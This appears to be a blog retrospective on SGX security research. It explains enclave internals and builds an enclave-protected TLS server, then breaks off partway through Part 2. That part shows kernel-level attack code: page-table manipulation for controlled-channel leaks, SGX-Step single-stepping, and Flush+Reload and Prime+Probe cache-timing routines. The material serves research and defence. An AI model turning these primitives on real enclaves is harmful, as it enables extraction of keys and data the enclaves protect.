Skip to content
articles

Intel SGX vulnerabilities

RETEX of one of my missions in a Japanese laboratory, where I contributed to a research project on the vulnerabilities of Intel Software Guard Extensions and on corrupting the kernel to defeat the guarantees of an SGX enclave.

26 min readarticle
  • Hardware
  • C++
  • pwn
  • Reverse Engineering
  • Kernel pwn

⚠️ Disclaimer , Everything described here was carried out in an isolated lab network, on hardware I was authorised to use, as part of a supervised research project. Unauthorised access to a computer system is a criminal offence (Article 323-1 of the French Penal Code, and the Act on Prohibition of Unauthorized Computer Access - 不正アクセス行為の禁止等に関する法律 - in Japan). I am not responsible for what you do with this material.

This post is a retrospective on a three-month research internship in the operating-systems and system-software laboratory of a Japanese university. The lab had been studying Intel SGX for several years, mostly from the defensive and cloud-deployment angle. I was the first person there to approach it from the other side: given a hostile kernel, can you read what an enclave is protecting?

The mission had two halves. First, build something real with SGX , a TLS server that keeps its keys and its plaintext inside an enclave , to learn the programming model from the inside. Then turn around and attack that model.

What SGX actually promises

Intel shipped Software Guard Extensions with Skylake in 2015. The idea: carve out a region of DRAM, the Enclave Page Cache (EPC), whose 4 KB pages can only be accessed by code running inside the enclave that owns them. Everything else , other processes, the kernel, the hypervisor, SMM, a person with physical access and a DRAM interposer , is treated as hostile.

Three mechanisms enforce this:

  • The EPCM (Enclave Page Cache Map), a hardware-managed table with one entry per EPC page recording its owner, type, virtual address and permissions. The MMU consults it in addition to the page tables, so the untrusted kernel can remap or unmap enclave pages but cannot repoint them at itself.
  • Abort page semantics. A read of an EPC page from outside the owning enclave does not fault and does not return the data , it returns 0xFF bytes, and writes are silently dropped. This is the single most important thing to understand before trying to attack an enclave: /dev/mem, a kernel module, a DMA-capable peripheral, all of them get 0xFF.
  • Memory encryption. On client SGX1 parts, the Memory Encryption Engine encrypts and integrity-protects EPC traffic leaving the CPU package, with a Merkle tree for anti-replay. On 3rd-gen Xeon Scalable and later this was replaced by AES-XTS to get from ~128 MB of EPC to 512 GB per socket , a deliberate trade of the integrity tree for capacity.

The instruction set is split in two. ENCLS is the ring-0 leaf family used by the kernel driver to manage enclaves (ECREATE, EADD, EEXTEND, EINIT, EBLOCK, ETRACK, EWB, ELDU, EPA, EREMOVE). ENCLU is the ring-3 family used by the application itself (EENTER, EEXIT, ERESUME, EGETKEY, EREPORT, plus EACCEPT/EMODPE/EACCEPTCOPY on SGX2).

Note the consequence, because everything else follows from it: an enclave is created by the untrusted OS. The kernel allocates it, copies the code in, measures it, and only then loses the ability to look inside. The enclave is passive; the adversary builds its own prison.

That measurement is what makes the arrangement useful. EINIT finalises MRENCLAVE, a SHA-256 measurement over the enclave's code, data and page layout; MRSIGNER is the hash of the signing key's modulus. EREPORT and EGETKEY let an enclave prove to a remote party what it is, and derive keys bound to either measurement so it can seal data to disk.

And what SGX explicitly does not promise, per Intel's own threat model: protection against side channels and against denial of service. That exclusion is the door the whole attack literature walks through, including my work.

Anatomy of an enclave

Before the offensive part, it is worth laying out the structures involved, because the attacks in Part 2 target them directly.

Address space and control structures

An enclave lives inside ELRANGE, a naturally-aligned, power-of-two virtual range reserved in the host process's address space. Inside the EPC, four page types matter:

Page type Role
SECS (SGX Enclave Control Structure) One per enclave. Holds ELRANGE base/size, attributes, MRENCLAVE, MRSIGNER, ISVPRODID/ISVSVN. Never mappable, not even by the enclave
TCS (Thread Control Structure) One per concurrently-entering thread. Holds the entry point offset, the SSA pointer, and the FS/GS bases used inside
SSA (State Save Area) Scratch space where the CPU spills register state on an asynchronous exit. One frame per nesting level (NSSA)
REG Ordinary enclave code, data, heap and stack

Thread capacity is fixed at build time, and it is a common source of confusing runtime failures , enter with no free TCS and the ECALL returns SGX_ERROR_OUT_OF_TCS rather than blocking. It is declared in the enclave configuration:

<EnclaveConfiguration>
  <ProdID>0</ProdID>
  <ISVSVN>1</ISVSVN>
  <StackMaxSize>0x40000</StackMaxSize>   <!-- per-thread stack -->
  <HeapInitSize>0x100000</HeapInitSize>  <!-- committed at EINIT -->
  <HeapMaxSize>0x1000000</HeapMaxSize>   <!-- grown lazily if EDMM is available -->
  <TCSNum>4</TCSNum>                     <!-- max concurrent ECALLs -->
  <TCSPolicy>1</TCSPolicy>               <!-- 1 = bound, 0 = unbound -->
  <DisableDebug>0</DisableDebug>
  <MiscSelect>0</MiscSelect>
  <MiscMask>0xFFFFFFFF</MiscMask>
</EnclaveConfiguration>

On SGX1 all of that is committed at EINIT and never changes, which is why the original EPC ceiling hurt so much: ~128 MB of PRM, roughly 93.5 MB usable, and beyond it the driver has to page EPC contents out with EBLOCK/ETRACK/EWB and back in with ELDU , encrypted, integrity-checked, version-array-tracked, and brutally slow. SGX2 added EDMM: pages can be EAUGed at runtime and must be EACCEPTed by the enclave itself, so the untrusted kernel cannot silently inject memory.

Entering and leaving

There are exactly two ways out of an enclave. EEXIT is voluntary and is what an OCALL compiles down to. An AEX (Asynchronous Enclave Exit) is involuntary , an interrupt, an exception, a page fault , and this is the mechanism the attacks exploit:

  1. The CPU spills the full register state into the current SSA frame.
  2. It scrubs the architectural registers and substitutes a synthetic state, so the interrupted state is never visible outside.
  3. It sets RIP to the AEP (Asynchronous Exit Pointer) trampoline in untrusted code and delivers the event to the OS.
  4. The untrusted side resumes with ERESUME, which reloads the SSA frame and continues.

The OS therefore learns that the enclave was interrupted, and , for a page fault , which page it was touching. Not the register state. That asymmetry is the entire attack surface.

Attestation and sealing

EREPORT produces a MAC'd structure containing MRENCLAVE, MRSIGNER, the attributes, the security version numbers, and 64 bytes of user data the enclave chooses (in practice a hash of a freshly-generated public key, which is how you bind a TLS session to an attested enclave):

/* inside the enclave */
sgx_report_t  report;
sgx_report_data_t rd = {0};

/* bind the report to a key the enclave just generated */
sgx_sha256_msg(pubkey, pubkey_len, (sgx_sha256_hash_t *)rd.d);

sgx_status_t st = sgx_create_report(&qe_target_info, &rd, &report);

Locally, another enclave verifies that MAC with EGETKEY. Remotely, the report goes to the platform's Quoting Enclave, which signs it into a quote. Historically that used EPID with an Intel-hosted attestation service; the current path is DCAP/ECDSA, where the quote is signed by a platform-provisioned attestation key and verified against Intel-issued PCK certificates, so you can run verification yourself:

/* untrusted side, DCAP */
sgx_target_info_t  qe_info;
uint32_t           quote_size;

sgx_qe_get_target_info(&qe_info);               /* pass to the enclave for EREPORT */
sgx_qe_get_quote_size(&quote_size);
sgx_qe_get_quote(&report, quote_size, quote_buf);

Sealing is the persistence story. EGETKEY derives a key from a hardware root, the CPU's CPUSVN, and either MRENCLAVE (only this exact build can unseal) or MRSIGNER (any enclave signed by the same key, which is what lets you ship an upgrade that reads old data):

uint32_t sealed_sz = sgx_calc_sealed_data_size(0, (uint32_t)key_len);
sgx_sealed_data_t *sealed = malloc(sealed_sz);

sgx_status_t st = sgx_seal_data_ex(
        SGX_KEYPOLICY_MRSIGNER,      /* survives a rebuild by the same signer */
        attribute_mask, misc_mask,
        0, NULL,                     /* no additional MAC'd plaintext */
        (uint32_t)key_len, key,
        sealed_sz, sealed);

Two consequences worth internalising. Sealed data is bound to the machine, so it does not migrate , a cloud enclave that reboots on different hardware cannot read its own state. And because the key derivation includes CPUSVN, a microcode update raises the TCB version and, by design, invalidates old sealed blobs: that is TCB recovery, and it is how Intel responded to Foreshadow.

Launch control

On the original hardware, EINIT required an EINITTOKEN from a Launch Enclave signed by an Intel-controlled key , you could not run a production enclave without Intel's blessing. Flexible Launch Control (FLC) moved that key hash into a set of writable MSRs (IA32_SGXLEPUBKEYHASH), which is why DCAP and third-party launch enclaves are possible at all. If you are checking whether a machine can do modern attestation, FLC is the bit to look for:

cpuid -1 -l 0x12 -s 0        # SGX1 / SGX2 leaf
grep -o 'sgx[a-z0-9_]*' /proc/cpuinfo | sort -u
# expect: sgx sgx1 sgx2 sgx_lc   <- sgx_lc = flexible launch control

Part 1 : A TLS server with its secrets in the enclave

Toolchain and environment

The lab infrastructure was two LANs , one for workstations, one for servers , bridged by an SSH gateway. Only one machine had an SGX-capable Intel CPU, so all the work happened there. I wrote an ~/.ssh/config with a ProxyJump so VS Code Remote could treat the SGX box as local:

Host gateway
    HostName gateway.lab.internal
    User <redacted>

Host sgx
    HostName sgx.lab.internal
    User <redacted>
    ProxyJump gateway

Build modes are not cosmetic, and this is worth stating before anything else. SGX_MODE=SIM emulates the instructions in userspace and provides no security whatsoever , useful for CI on a machine without SGX, worthless as a test of your threat model. And a debug enclave is deliberately transparent: the EDEBUGRD/EDEBUGWR leaves let sgx-gdb read and write enclave memory at will. Confidentiality only exists for a release-signed enclave with DisableDebug set. Any claim of the form "I dumped an enclave's memory" deserves the question: was it a debug build?

# no security, runs anywhere
make SGX_MODE=SIM SGX_DEBUG=1

# real hardware, but sgx-gdb can still read the enclave
make SGX_MODE=HW SGX_DEBUG=1

# what you actually deploy
make SGX_MODE=HW SGX_DEBUG=0 SGX_PRERELEASE=0
sgx_sign sign -key private.pem -enclave enclave.so \
              -out enclave.signed.so -config Enclave.config.xml

The EDL file is the security boundary

Every enclave has an .edl interface definition, compiled by sgx_edger8r into bridge code , proxy stubs on the untrusted side, entry trampolines on the trusted side:

enclave {
    include "sgx_tcrypto.h"

    trusted {
        /* [in] => the bridge copies the buffer into enclave memory first */
        public sgx_status_t ecall_load_aes_key([in, count=16] const uint8_t *key);

        public sgx_status_t ecall_seal_message(
                [in,  size=len]     const char    *msg,
                                    size_t         len,
                [out, size=out_len] uint8_t       *ct,
                                    size_t         out_len,
                [out]               sgx_aes_gcm_128bit_tag_t *tag);

        /* no copy: we take the raw host pointer and must validate it ourselves */
        public sgx_status_t ecall_bulk_hash([user_check] const uint8_t *buf,
                                            size_t len,
                                            [out] sgx_sha256_hash_t *out);
    };

    untrusted {
        void ocall_write_log([in, string] const char *line);
        void ocall_send([in, size=len] const uint8_t *buf, size_t len);
    };
};
sgx_edger8r --trusted   Enclave.edl --search-path $(SGX_SDK)/include
sgx_edger8r --untrusted Enclave.edl --search-path $(SGX_SDK)/include

The annotations are not documentation, they are code generation. [in] makes the generated bridge copy the buffer into enclave memory before your function sees it; without it you are holding a pointer into memory the attacker controls and can mutate between your check and your use. [user_check] skips the copy , legitimate for large buffers, but then validation is yours to do, and skipping it is the dominant real-world SGX bug class (TeeRex found it in a majority of the enclaves it examined). An attacker who can pass an address inside your enclave turns your memcpy into an arbitrary write across the boundary:

sgx_status_t ecall_bulk_hash(const uint8_t *buf, size_t len, sgx_sha256_hash_t *out)
{
    /* mandatory with user_check: reject anything overlapping the enclave */
    if (len == 0 || !sgx_is_outside_enclave(buf, len))
        return SGX_ERROR_INVALID_PARAMETER;

    /* also reject integer overflow in the caller's length */
    if (len > SIZE_MAX - sizeof(sgx_sha256_hash_t))
        return SGX_ERROR_INVALID_PARAMETER;

    return sgx_sha256_msg(buf, (uint32_t)len, out);
}

The mirror-image rule applies to anything an OCALL hands back: an OCALL return value is attacker-controlled by definition. sgx_is_within_enclave() is the check for the other direction, when you must be sure a pointer is internal.

The link line also has to pull in the trusted runtime explicitly, or nothing resolves:

SGX_SDK ?= /opt/intel/sgxsdk
SGX_LIBRARY_PATH := $(SGX_SDK)/lib64

Enclave_Link_Flags := -nostdlib -nodefaultlibs -nostartfiles -L$(SGX_LIBRARY_PATH) \
    -Wl,--whole-archive -lsgx_trts -Wl,--no-whole-archive                          \
    -Wl,--start-group -lsgx_tstdc -lsgx_tcxx -lsgx_tcrypto -lsgx_tservice          \
    -Wl,--end-group                                                               \
    -Wl,-Bstatic -Wl,-Bsymbolic -Wl,--no-undefined -Wl,-pie,-eenclave_entry        \
    -Wl,--export-dynamic -Wl,--defsym,__ImageBase=0 -Wl,--gc-sections              \
    -Wl,--version-script=Enclave/Enclave.lds

Cryptography inside the enclave

An enclave cannot make system calls. The trusted runtime ships tlibc, a subset of libc with no syscall layer , no sockets, no open(), no trustworthy time(). Anything touching the outside world leaves through an OCALL.

I used sgx_tcrypto for symmetric work and the in-enclave OpenSSL port (Intel SGX SSL) for the TLS primitives, with sgx_read_rand() (RDRAND-backed) for key material. sgx_tcrypto exposes AES-GCM with a 128-bit key; anything wider goes through SGX SSL. Three keys live inside the enclave and never leave it in plaintext: the server's long-term signing key, its ephemeral key-agreement key, and an internal AES-GCM key used to encrypt message bodies at rest.

static sgx_aes_gcm_128bit_key_t g_aes_key;   /* enclave .data , never leaves */
static uint64_t                 g_counter;   /* monotonic, for the IV and the AAD */

sgx_status_t ecall_seal_message(const char *msg, size_t len,
                               uint8_t *ct, size_t out_len,
                               sgx_aes_gcm_128bit_tag_t *tag)
{
    if (out_len < len) return SGX_ERROR_INVALID_PARAMETER;

    /* GCM nonce reuse is fatal: derive it from a counter, never from rand alone */
    uint8_t iv[12] = {0};
    uint64_t seq = ++g_counter;
    memcpy(iv + 4, &seq, sizeof seq);

    /* bind the sequence number into the tag so a replay is detectable */
    return sgx_rijndael128GCM_encrypt(&g_aes_key,
                                      (const uint8_t *)msg, (uint32_t)len,
                                      ct,
                                      iv, sizeof iv,
                                      (const uint8_t *)&seq, sizeof seq,  /* AAD */
                                      tag);
}

The key itself is generated in the enclave and sealed to disk, so a restart does not need an operator to re-enter it:

sgx_status_t ecall_init_keys(uint8_t *sealed_out, uint32_t sealed_sz)
{
    sgx_status_t st = sgx_read_rand((unsigned char *)&g_aes_key, sizeof g_aes_key);
    if (st != SGX_SUCCESS) return st;

    return sgx_seal_data_ex(SGX_KEYPOLICY_MRSIGNER,
                            TSEAL_DEFAULT_FLAGSMASK, 0xF0000000,
                            0, NULL,
                            sizeof g_aes_key, (uint8_t *)&g_aes_key,
                            sealed_sz, (sgx_sealed_data_t *)sealed_out);
}

On the TLS side, it is worth being precise about what the asymmetric crypto is actually for, because it is routinely misdescribed. The record layer is protected by a symmetric AEAD , AES-GCM or ChaCha20-Poly1305. The asymmetric part does two distinct jobs: key agreement (ECDHE, which is what provides forward secrecy) and authentication (an RSA or ECDSA signature over the handshake transcript, chaining to the certificate). TLS 1.3 removed static RSA key transport altogether, so RSA never encrypts traffic there at all.

What matters from an SGX standpoint is which of those steps runs where. The handshake signature, the ECDHE private scalar and the key schedule run inside the enclave; the socket, the record framing and the TCP state machine run outside. The untrusted side therefore handles ciphertext, lengths and timing only:

/* enclave: sign the transcript without ever exporting the private key */
sgx_status_t ecall_sign_transcript(const uint8_t *hash, size_t hash_len,
                                   uint8_t *sig, size_t *sig_len)
{
    if (!sgx_is_outside_enclave(sig, *sig_len)) return SGX_ERROR_INVALID_PARAMETER;

    unsigned int n = 0;
    if (ECDSA_sign(0, hash, (int)hash_len, sig, &n, g_ec_key) != 1)
        return SGX_ERROR_UNEXPECTED;   /* g_ec_key lives in enclave memory */

    *sig_len = n;
    return SGX_SUCCESS;
}

The SGX-Queue

For storing client data I built a small structure I called SGX-Queue: a FIFO whose push encrypts inside the enclave and whose pop decrypts inside the enclave, so no call site outside ever handles plaintext. It is two parallel queues , ciphertexts, and the plaintext lengths the consumer needs in order to trim.

class SgxQueue {
public:
    void push(const std::string &msg) {
        std::lock_guard<std::mutex> lk(m_);

        std::vector<uint8_t> ct(msg.size());
        sgx_aes_gcm_128bit_tag_t tag{};

        sgx_status_t rc, st = ecall_seal_message(eid_, &rc,
                                                msg.data(), msg.size(),
                                                ct.data(), ct.size(), &tag);
        if (st != SGX_SUCCESS || rc != SGX_SUCCESS) throw std::runtime_error("seal");

        ct_.push({std::move(ct), tag});
        len_.push(msg.size());          /* metadata: see the caveat below */
    }

    std::string pop() {
        std::lock_guard<std::mutex> lk(m_);
        if (ct_.empty()) return {};

        auto  entry = std::move(ct_.front()); ct_.pop();
        size_t n    = len_.front();           len_.pop();

        std::string out(n, '\0');
        sgx_status_t rc;
        ecall_unseal_message(eid_, &rc, entry.ct.data(), entry.ct.size(),
                             &entry.tag, out.data(), n);
        if (rc != SGX_SUCCESS) throw std::runtime_error("unseal");
        return out;                     /* first moment plaintext exists outside */
    }

private:
    struct Entry { std::vector<uint8_t> ct; sgx_aes_gcm_128bit_tag_t tag; };
    sgx_enclave_id_t        eid_;
    std::queue<Entry>       ct_;
    std::queue<size_t>      len_;
    std::mutex              m_;
};

Two honest limitations of this design. Storing the plaintext length in the clear is a metadata leak , small, but free for an observer; padding to fixed-size buckets removes it. More importantly, the queue's own bookkeeping (heads, tails, the length queue) lives in untrusted memory, so a hostile kernel can drop, reorder or replay entries without ever reading them. Confidentiality is protected; integrity and freshness of the container are not. That is why the sequence number goes into the AEAD's additional authenticated data above , it lets the enclave detect reordering , and a stricter version would keep the queue indices inside the enclave entirely.

Server, client, and what the network sees

The server has two states. It unseals its keys and certificate into the enclave, waits for a client to present a well-formed connection request, performs the key exchange, then switches to a receive loop. Incoming records are decrypted in the enclave, which then splits out only the fields the untrusted side legitimately needs , source address, nickname, length , and passes those out through an OCALL for logging and display.

/* untrusted side: load the enclave once, then serve */
sgx_enclave_id_t eid;
sgx_launch_token_t token = {0};
int updated = 0;

if (sgx_create_enclave("enclave.signed.so", SGX_DEBUG_FLAG,
                       &token, &updated, &eid, NULL) != SGX_SUCCESS)
        die("sgx_create_enclave");

The client takes the server name, port and a nickname, sends a connection payload, and checks the server's response against the expected key before continuing , pinning, which is the right instinct, and the natural place to upgrade to attestation: instead of pinning a key, verify a DCAP quote whose report data binds that key to a known MRENCLAVE. Then you are trusting a measurement of the code rather than a fingerprint of a key.

The wire format concatenates four fields:

message length ; sender IP ; message ; nickname

Delimiter-separated text parsed inside a trusted boundary is a parser differential waiting to happen , a nickname containing ; changes the meaning of the record, and the parsing happens exactly where a bug is most expensive. A length-prefixed binary encoding is the correct choice:

/* every field explicitly bounded, parsed inside the enclave */
struct record {
    uint32_t magic;      /* 'SGXQ' */
    uint32_t seq;        /* replay detection */
    uint16_t nick_len;   /* <= 32  */
    uint16_t msg_len;    /* <= 4096 */
    uint8_t  data[];     /* nick_len + msg_len bytes */
} __attribute__((packed));

One thing to be precise about: an SGX-backed TLS service is not hidden from a port scanner. An open TCP port completes a handshake with anything that sends a SYN, so nmap -sS finds it whatever the application does afterwards. Refusing to answer non-conforming payloads defeats service and version fingerprinting (nmap -sV) , the port shows as open but unidentified , which is worth having but is a different property. Actually hiding a service needs firewall rules, port knocking, or single-packet authorisation (fwknop).

Logs and the web GUI

On receipt, the server writes the sender's address and the AES-GCM ciphertext to server.log, the persistent encrypted record. Separately it pops the front of the SGX-Queue into a short-lived temp.log holding nickname, plaintext message and a colour code, which a Node.js watcher turns into HTML served by nginx, truncating the file after each read. The colour is derived per (IP, nickname) pair so an impersonator using a stolen nickname renders in a different colour.

The architectural limit here is worth naming: temp.log is plaintext on disk, outside the enclave. The moment you want a human-readable UI on the server, you are exporting plaintext and the enclave's guarantee ends at that boundary. A deployable design terminates the encryption in the browser , attest the enclave from the client, negotiate a key with it directly, and never let server-side plaintext exist. My version demonstrated the plumbing, not a shippable trust model.

Testing what I had built

I scanned the box with Nmap (which is how I found the fingerprinting issue), took a MITM position with Wireshark to confirm the records were genuinely encrypted and the negotiated version and cipher suite were sane, and fuzzed the input paths with progressively longer and malformed strings.

Fuzzing an SGX application from the outside, though, barely touches the interesting surface. The attack surface is the ECALL boundary: every argument crossing in, every pointer, every length. Tools built for this (SGXFuzz, TeeRex) enumerate ECALLs from the enclave binary and fuzz their arguments directly, including hostile pointer values pointing back into the enclave , which is where the exploitable bugs live. A minimal harness looks like this:

/* fuzz the boundary, not the socket */
int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size)
{
    if (size < 8) return 0;

    /* half the interesting inputs are pointers, not payloads */
    const void *ptrs[] = { data, NULL, (void *)enclave_base, (void *)-1 };
    const void *p = ptrs[data[0] % 4];

    sgx_status_t rc;
    ecall_bulk_hash(g_eid, &rc, p, *(const uint32_t *)(data + 1), &g_out);
    return 0;
}

Part 2 : Attacking the enclave

Why a malicious kernel is the correct adversary

This is not an exotic threat model, it is SGX's stated one. SGX assumes the OS is compromised; that is the entire point of the technology. A malicious kernel is therefore not cheating , it is the adversary the design claims to withstand. The research question is precise: given full ring-0 control, what can you actually extract?

The naive answer is nothing, and the reason is instructive. A kernel module that maps and reads EPC pages gets 0xFF bytes, because of abort page semantics. A DMA read over PCIe gets ciphertext, because the memory controller encrypts EPC traffic on its way to DRAM. A physical DRAM tap gets the same. Every direct route is closed by construction:

/* ring 0, mapping the EPC directly: this "works" and tells you nothing */
void *p = ioremap_cache(epc_phys_base, PAGE_SIZE);
pr_info("epc[0..7] = %16phN\n", p);
/* epc[0..7] = FFFFFFFFFFFFFFFF   <- abort page semantics, every time */
iounmap(p);

That is why the entire literature is side channels and micro-architectural leaks: the data path is sealed, so you attack the metadata path the OS is legitimately allowed to see.

Reverse engineering enclave creation

I wanted to know what a process looks like, from the kernel's point of view, at the moment it creates an enclave, so that a module could detect it. I wrote a ptrace-based tracer to record the syscalls made while a sample enclave was built:

/* minimal syscall tracer */
pid_t child = fork();
if (child == 0) {
    ptrace(PTRACE_TRACEME, 0, NULL, NULL);
    execl(target, target, NULL);
    _exit(127);
}

int status;
struct user_regs_struct regs;
waitpid(child, &status, 0);

for (;;) {
    /* stop on syscall entry */
    if (ptrace(PTRACE_SYSCALL, child, 0, 0) < 0) break;
    if (waitpid(child, &status, 0) < 0 || WIFEXITED(status)) break;

    ptrace(PTRACE_GETREGS, child, 0, &regs);
    printf("syscall %-4llu  rdi=0x%llx rsi=0x%llx rdx=0x%llx\n",
           regs.orig_rax, regs.rdi, regs.rsi, regs.rdx);

    /* and again to skip the exit stop */
    ptrace(PTRACE_SYSCALL, child, 0, 0);
    waitpid(child, &status, 0);
}

The signature was unmistakable: an mmap, a long run of ioctls, then mprotect. In strace terms, with the in-tree driver:

openat(AT_FDCWD, "/dev/sgx_enclave", O_RDWR)        = 3
mmap(NULL, 0x400000, PROT_NONE, MAP_SHARED, 3, 0)   = 0x7f2e40000000
ioctl(3, _IOC(_IOC_WRITE, 0xa4, 0x0, 0x10), ...)    = 0   /* ENCLAVE_CREATE    */
ioctl(3, _IOC(_IOC_READ|_IOC_WRITE, 0xa4, 0x1, 0x30), ...) = 0   /* ADD_PAGES */
ioctl(3, _IOC(_IOC_READ|_IOC_WRITE, 0xa4, 0x1, 0x30), ...) = 0   /* ADD_PAGES */
...                                                       /* once per region  */
ioctl(3, _IOC(_IOC_WRITE, 0xa4, 0x2, 0x8), ...)     = 0   /* ENCLAVE_INIT     */
mprotect(0x7f2e40000000, 0x2000, PROT_READ|PROT_EXEC)      = 0

Mapped onto the architecture, that sequence is:

  1. open("/dev/sgx_enclave") , the in-tree Linux driver since 5.11 exposes /dev/sgx_enclave and /dev/sgx_provision; the older out-of-tree Intel driver used /dev/isgx, which is what a lot of documentation from that era still refers to.
  2. mmap of ELRANGE, initially PROT_NONE.
  3. SGX_IOC_ENCLAVE_CREATE → the driver executes ECREATE, turning an EPC page into the enclave's SECS.
  4. SGX_IOC_ENCLAVE_ADD_PAGES, repeatedly → EADD plus EEXTEND per 4 KB page, copying the enclave image in and folding each page into MRENCLAVE. This is the long run of near-identical ioctls: one batch per region of the enclave binary.
  5. SGX_IOC_ENCLAVE_INIT → EINIT, which checks the SIGSTRUCT signature against the computed MRENCLAVE, sets the INIT attribute, and closes the enclave to further EADD.
  6. mprotect to install the final per-page permissions, which the EPCM independently constrains.

The privilege relationship is the thing to hold onto: ioctl is a system call. It enters the kernel and dispatches to the SGX driver, which is the component that executes the ENCLS leaves in ring 0 on the process's behalf. Userspace cannot issue ENCLS at all , that is precisely why the ioctl exists. The "device" behind the file descriptor is the driver's character device, not the CPU. And because everything goes through the kernel, everything is observable: strace, ftrace, audit, kprobes.

Which makes detection far easier than syscall-pattern matching. Hook the driver directly:

#include <linux/kprobes.h>

static int handler_pre(struct kprobe *p, struct pt_regs *regs)
{
    /* x86-64 SysV: file* in rdi, cmd in rsi, arg in rdx */
    unsigned int cmd = (unsigned int)regs->si;

    switch (cmd) {
    case SGX_IOC_ENCLAVE_CREATE:
        pr_info("sgx: ECREATE  pid=%d comm=%s\n", current->pid, current->comm);
        break;
    case SGX_IOC_ENCLAVE_INIT:
        pr_info("sgx: EINIT    pid=%d , enclave live, start watching\n",
                current->pid);
        break;
    }
    return 0;
}

static struct kprobe kp = {
    .symbol_name = "sgx_ioctl",     /* static, but present in kallsyms */
    .pre_handler = handler_pre,
};

static int __init m_init(void)  { return register_kprobe(&kp); }
static void __exit m_exit(void) { unregister_kprobe(&kp); }

module_init(m_init);
module_exit(m_exit);
MODULE_LICENSE("GPL");

One probe sees every enclave creation on the machine, unambiguously, with the owning PID and the exact lifecycle stage.

The controlled-channel (page-fault) attack

Enclave code reaches its own data by dereferencing a pointer; it does not ask the kernel for permission. The attack works because the kernel still owns the page tables for ELRANGE. The EPCM prevents the kernel from reading those pages; it does nothing to stop the kernel from unmapping them.

  1. The attacker clears the present bit on the enclave pages it wants to watch.
  2. Enclave code eventually touches one. The page walk fails and the CPU performs an AEX: register state is spilled to the SSA, a synthetic state is presented outside, and control lands in the kernel's #PF handler.
  3. The handler reads the faulting address from CR2. For enclave faults SGX page-aligns CR2, so the leak is at 4 KB granularity rather than byte granularity , a deliberate mitigation, and the reason this channel is coarse.
  4. The handler restores the present bit, ERESUMEs the enclave, and immediately clears the bit again, so the next access to that page faults too.

The primitive is a page-table walk plus a TLB shootdown, and it is short enough to be worth showing:

static pte_t *walk(struct mm_struct *mm, unsigned long addr)
{
    pgd_t *pgd = pgd_offset(mm, addr);
    p4d_t *p4d = p4d_offset(pgd, addr);
    pud_t *pud = pud_offset(p4d, addr);
    pmd_t *pmd = pmd_offset(pud, addr);

    if (pgd_none(*pgd) || p4d_none(*p4d) || pud_none(*pud) || pmd_none(*pmd))
        return NULL;
    return pte_offset_kernel(pmd, addr);
}

/* revoke: the enclave's next touch of this page traps into our handler */
static void hide_page(struct mm_struct *mm, unsigned long addr)
{
    pte_t *pte = walk(mm, addr);
    if (!pte) return;

    set_pte(pte, pte_clear_flags(*pte, _PAGE_PRESENT));
    __flush_tlb_one_user(addr);         /* stale TLB entry would defeat this */
}

The result is a trace of the sequence of pages the enclave touched , nothing more. That sounds weak; it is not. Xu, Cui and Peinado showed in 2015 that page-access traces alone recover full JPEG images and complete text documents from unmodified enclaved libraries, because control flow is data-dependent. The channel is deterministic and noise-free, which makes it far stronger in practice than a timing channel.

The natural refinement is SGX-Step: configure the local APIC timer in one-shot mode to fire during the first instruction after ERESUME, giving single-instruction-granularity interruption, and read the accessed/dirty bits straight from the PTEs instead of relying on faults at all:

/* SGX-Step, conceptually: one interrupt per enclave instruction */
apic_timer_oneshot(APIC_TDR_DIV_2);
apic_write(APIC_TMICT, SGX_STEP_TIMER_INTERVAL);   /* calibrated per CPU */

/* in the APIC IRQ handler, after each single step: */
if (pte->accessed) {                 /* the enclave touched this page */
    log_page(virt);
    pte->accessed = 0;               /* re-arm without unmapping anything */
}

Worth distinguishing two families that get conflated here. This is a controlled-channel attack: an information leak through an interface the OS legitimately controls, perturbing nothing. A fault attack in the cryptanalytic sense means physically perturbing the computation , glitching voltage or clock, as in Plundervolt, which really does break SGX by undervolting during AES-NI and multiplications until the results are wrong in an exploitable way.

Cache attacks

The reason cache attacks work on SGX at all: EPC data is cached in plaintext in L1/L2/L3. Encryption happens only on the way out to DRAM. The cache hierarchy is shared, unpartitioned state, and the enclave's access pattern shapes it.

The classic Flush+Reload measurement is a clflush, a wait, and a timed reload:

#include <x86intrin.h>

static inline uint64_t timed_load(const void *addr)
{
    unsigned aux;
    _mm_mfence();
    uint64_t t0 = __rdtscp(&aux);
    (void)*(volatile const char *)addr;
    uint64_t t1 = __rdtscp(&aux);
    _mm_mfence();
    return t1 - t0;
}

/* the classic lookup-table leak: table[] lives OUTSIDE the enclave */
uint64_t probe_table(const uint8_t *table, size_t stride, size_t n)
{
    for (size_t i = 0; i < n; i++) _mm_clflush(&table[i * stride]);  /* flush  */

    ecall_process(g_eid);                                             /* victim */

    for (size_t i = 0; i < n; i++)
        if (timed_load(&table[i * stride]) < CACHE_HIT_THRESHOLD)
            return i;                     /* fast line => the index used */
    return (uint64_t)-1;
}

I ran exactly this: an enclave holding a secret, touched through an ECALL, and the candidate line corresponding to 4 came back measurably faster. But note precisely what leaked. Flush+Reload requires attacker and victim to share the same cache line, which means the attacker needs a virtual mapping in order to clflush it , and an attacker cannot map an EPC page. What the experiment recovered was an outside-the-enclave lookup table indexed by the secret, the classic AES T-table pattern. The secret leaked because the index leaked.

Against enclave memory proper, the working primitive is Prime+Probe, which needs no shared mapping , you fill a cache set with your own lines, let the enclave run, and see which of yours were evicted:

/* Prime+Probe on one L1D set: no mapping of enclave memory required */
uint64_t prime_probe(void **eviction_set, size_t ways)
{
    for (size_t i = 0; i < ways; i++)          /* prime  */
        (void)*(volatile void **)eviction_set[i];

    ecall_process(g_eid);                      /* victim runs, may evict us */

    uint64_t total = 0;
    for (size_t i = 0; i < ways; i++)          /* probe  */
        total += timed_load(eviction_set[i]);

    return total;   /* high => the enclave used this set */
}

In practice you co-locate on the same physical core via hyperthreading for L1/L2 resolution (CacheZoom), or exploit LLC inclusiveness on the generations where it holds. Combined with SGX-Step's single-stepping, you get a per-instruction view of which cache sets the enclave touches.

The defensive answer is not a hardware fix , it is data-oblivious code. No secret-dependent branches, no secret-dependent memory indices:

/* leaks the secret through the branch predictor and the page/cache trace */
uint32_t bad(const uint32_t *tbl, uint32_t secret) {
    return secret ? tbl[secret] : 0;
}

/* constant-time select: same instructions, same accesses, every time */
static inline uint32_t ct_select(uint32_t a, uint32_t b, int cond) {
    uint32_t mask = (uint32_t)(-(int32_t)(!!cond));
    return (a & mask) | (b & ~mask);
}

/* constant-time table read: touch every line, keep only the one you want */
uint32_t good(const uint32_t *tbl, size_t n, uint32_t secret) {
    uint32_t acc = 0;
    for (size_t i = 0; i < n; i++)
